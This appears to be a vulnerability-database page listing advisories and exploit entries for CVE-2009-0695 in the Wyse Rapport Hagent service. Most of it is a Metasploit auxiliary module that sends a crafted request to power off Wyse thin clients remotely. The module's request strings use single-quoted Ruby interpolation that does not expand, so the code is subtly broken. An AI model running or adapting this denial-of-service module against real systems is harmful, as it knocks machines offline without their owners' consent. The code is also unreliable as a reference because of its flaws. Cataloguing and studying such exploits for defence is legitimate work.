| Reporter | Title | Published | Views | Family All 16 |
|---|---|---|---|---|
| Wyse Machine Remote Power off (DOS) without any privilege | 13 Jun 201200:00 | – | zdt | |
| CVE-2009-0695 | 10 Jul 200900:00 | – | circl | |
| CVE-2009-0695 | 19 Jun 201220:00 | – | cve | |
| CVE-2009-0695 | 19 Jun 201220:00 | – | cvelist | |
| Wyse Rapport Hagent Fake Hserver Command Execution | 11 Nov 201000:00 | – | exploitdb | |
| Wyse Rapport Hagent Fake Hserver - Command Execution (Metasploit) | 10 Jul 200900:00 | – | exploitdb | |
| Wyse - Machine Remote Power Off (Denial of Service) (Metasploit) | 14 Jun 201200:00 | – | exploitpack | |
| Wyse Rapport Hagent Fake Hserver - Command Execution (Metasploit) | 10 Jul 200900:00 | – | exploitpack | |
| Wyse Rapport Hagent Fake Hserver Command Execution | 9 Sep 200921:23 | – | metasploit | |
| CVE-2009-0695 | 19 Jun 201220:55 | – | nvd |
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
Rank = ExcellentRanking
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
'Name' => 'Wyse Machine Remote Power off (DOS)',
'Description' => %q{
This module exploits the Wyse Rapport Hagent service and cause
remote power cycle (Power off the wyse machine remotely).
},
'Stance' => Msf::Exploit::Stance::Aggressive,
'Author' => '[email protected]',
'Version' => '$Revision: 14976 $',
'References' =>
[
['CVE', '2009-0695'],
['OSVDB', '55839'],
['US-CERT-VU', '654545'],
['URL', 'http://snosoft.blogspot.com/'],
['URL', 'http://www.theregister.co.uk/2009/07/10/wyse_remote_exploit_bugs/'],
['URL', 'http://www.wyse.com/serviceandsupport/support/WSB09-01.zip'],
['URL', 'http://www.wyse.com/serviceandsupport/Wyse%20Security%20Bulletin%20WSB09-01.pdf'],
],
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Targets' =>
[
[ 'Wyse Linux x86', {'Platform' => 'linux',}],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jun 13 2012'
))
register_options(
[
Opt::RPORT(80),
], self.class)
end
def run
# Connect to the target service
print_status("Connecting to the target #{rhost}:#{rport}")
if connect
print_status("Connected...")
end
# Parameters
genmac = "00"+Rex::Text.rand_text(5).unpack("H*")[0]
craft_req = '&V52&CI=3|'
craft_req << 'MAC=#{genmac}|#{rhost}|'
craft_req << 'RB=0|MT=3|'
craft_req << '|HS=#{rhost}|PO=#{rport}|'
craft_req << 'SPO=0|'
# Send the malicious request
sock.put(craft_req)
# Download some response data
resp = sock.get_once(-1, 10)
print_status("Received: #{resp}")
disconnect
if not resp
print_error("No reply from the target, this may not be a vulnerable system")
return
end
if resp == '&00'
print_status("#{rhost} execute command succefuly & power off.")
return
end
#Exeptions
rescue ::Rex::ConnectionRefused
print_status("Couldn't connect to #{rhost}:#{rport} | Connection refused.")
rescue ::Rex::HostUnreachable
print_status("Couldn't connect to #{rhost}:#{rport} | Host unreachable")
rescue ::Rex::ConnectionTimeout
print_status("Couldn't connect to #{rhost}:#{rport} | Connection time out")
rescue ::Errno::ECONNRESET, ::Timeout::Error
print_status("#{rhost} not responding.")
end
endData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation